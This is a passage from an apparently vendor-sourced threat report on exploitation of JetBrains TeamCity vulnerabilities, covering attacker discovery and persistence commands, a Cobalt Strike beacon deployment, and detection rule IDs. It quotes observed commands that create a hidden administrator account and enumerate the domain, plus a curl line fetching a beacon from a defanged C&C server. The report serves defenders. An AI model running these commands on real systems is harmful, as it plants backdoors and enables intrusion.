TeamCity Vulnerability Exploits Lead to Jasmin Ransomware, Other Malware Types

Executing domain discovery and persistence commands

Aside from malware deployment, we have also seen several attempts to discover network infrastructure and employ persistence commands arising from the java.exe process under a vulnerable TeamCity server directory.

Parent Process:
C:TeamCityjrebinjava.exe

We observed the following subject processes being used for discovery and persistence tactics:

• C:WINDOWSsystem32net.exe  group /domain
• C:WINDOWSsystem32net1.exe localgroup Administratoren /add Default$
• C:WINDOWSsystem32net1.exe localgroup Administrators /add Default$
• C:WINDOWSsystem32net1.exe user /add Default$ GH{redacted}23gwg
• C:WINDOWSsystem32net1.exe user /del defaultuser0
• C:WINDOWSsystem32net1.exe user /domain
• C:WINDOWSsystem32net1.exe user administrator
• C:WINDOWSsystem32net1.exe user default$
• C:WINDOWSsystem32nltest.exe  /domain_trusts

Several of these commands involve attempts to manipulate user accounts, groups, and permissions, which are typical actions taken by attackers seeking to gain unauthorized access to a system. The attempt to add a user to the local Administrators group is particularly concerning, since it could grant elevated privileges to attackers and help them establish a foothold in the system that can be used to maintain access over an extended period.

Deploying Cobalt Strike beacons

Finally, we found threat actors deploying Cobeacon to vulnerable TeamCity servers. In one of the environments with a vulnerable TeamCity server, we found that a beacon (SHA1: db6bd96b152314db3c430df41b83fcf2e5712281) was deployed.

The beacon was downloaded using the command curl  hxxp://83[.]97[.]20[.]141:81/beacon.out -o .conf and was saved in the path C:TeamCitybin.conf.

This was detected by the Trend Pattern Backdoor.Linux.COBEACON.SMYXDKV. The beacon reaches out to the C&C server 83[.]97[.]20[.]141, which we have already proactively detected as of this writing.

Conclusion

The active exploitation of vulnerabilities within TeamCity On-Premises represents a critical threat to organizations relying on this platform for their CI/CD processes. Our telemetry has revealed that threat actors are exploiting these vulnerabilities to deploy ransomware, coinminers, and backdoor payloads on compromised TeamCity servers.

This malicious activity not only jeopardizes the confidentiality, integrity, and availability of sensitive data and critical systems but also imposes financial and operational risks for affected organizations. Swift action is imperative to mitigate these vulnerabilities and prevent further damage from ransomware extortion and other types of malware.

The following protections exist to detect malicious activity and shield Trend customers against the exploitation of the TeamCity On-Premises vulnerabilities discussed in this entry.

• 43957 – HTTP: JetBrains TeamCity Directory Traversal Vulnerability
• 43958 – HTTP: JetBrains TeamCity Authentication Bypass Vulnerability

• 5011 – CVE-2024-27198 – JetBrains TeamCity Auth Bypass Exploit – HTTP (Response)
• 5012 – CVE-2024-27199 – JetBrains TeamCity Directory Traversal Exploit – HTTP (Response)

• 1011995 – JetBrains TeamCity Authentication Bypass Vulnerability (CVE-2024-21798)
• 1011996 – JetBrains TeamCity Directory Traversal Vulnerability (CVE-2024-21799)

About Author

AndyC

Andy Curtis is an award-winning security consultant, researcher and public speaker. He has been working in the computer security industry since the early 1990s, having been employed by state and federal government, leading healthcare and banking providers across three continents. He has given talks about computer security for some of the world’s largest companies, worked with law enforcement agencies on investigations into hacking groups, and is a regular voice on TV and radio explaining IT security threats.

See author's posts